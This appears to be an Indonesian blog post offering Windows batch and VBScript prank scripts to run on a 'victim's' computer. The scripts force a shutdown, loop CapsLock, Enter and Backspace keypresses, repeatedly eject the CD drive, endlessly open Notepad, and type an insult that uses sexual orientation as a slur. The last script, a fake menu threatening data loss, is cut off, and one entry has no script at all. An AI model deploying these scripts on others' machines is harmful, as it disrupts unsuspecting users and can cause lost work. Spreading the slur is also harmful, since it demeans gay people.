- Memberi pesan dan shutdown komputer. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.BATSource Script
@echo off msg * Komment dulu ahh sebelum Shutdown shutdown -c "Error! Shutdown Klik disini" -s
- Menyalakan tombol Caps lock secara terus-menerus. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.VBS
Source Script
Set wshShell=wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop
- Buka/tutup CD drive secara terus menerus. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.VBS
Source Script
Set oWMP = CreateObject ("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
- Tekan Enter secara terus-menerus. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.VBS
Source Script
Set wshShell = wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop
- Mengetik pesan kita secara otomatis di notepad. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.VBS
Source Script
- Menjalankan BACKSPACE secara terus-menerus. Buka Notepad ketik script dibawah ini dan SaveAs menggunakan Extension *.VBS
Source Script
MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop
- Hack keyboard sehingga korban dipaksa mengetik "You are a maho"
secara terus-menerus. Buka Notepad ketik script dibawah ini dan Save As
menggunakan Extension *.VBS
Source Script
Set wshShell = wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a gay" loop
- Buka Notepad secara terus menerus. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension *.BAT
Source Script
@ECHO off :top START %SystemRoot% \system32\notepad.exe GOTO top
- Munculin 5 pilihan yang harus korban pilih. Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT
Source Script
@echo off title The end of the world cd C:\ :menu cls echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri... pause echo pilih nama blog yang lu suka =P : echo 1. datanya bakal ilang lho. echo 2. komputer nya corrupt lho echo 3. heheh no comment deh klo yang ini echo 4. mau mati pake jalan ini? echo 5. bye bye... set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two
Catatan: Untuk mengembalikan seperti semula… tekan CTRL+ALT+DEL
lalu muncul Task Manager, klik tab process dan cari wscript.exe, kalau
sudah ketemu klik dan End Process.
selamat mencoba
Selebihnya silahkan pahami dan experimen sendiri juga kembangkan lagi.
Pesan Saya, Jangan Jahilin orang yang tidak berdosa, apalagi tak tau apa-apa soal komputer.
No comments:
Post a Comment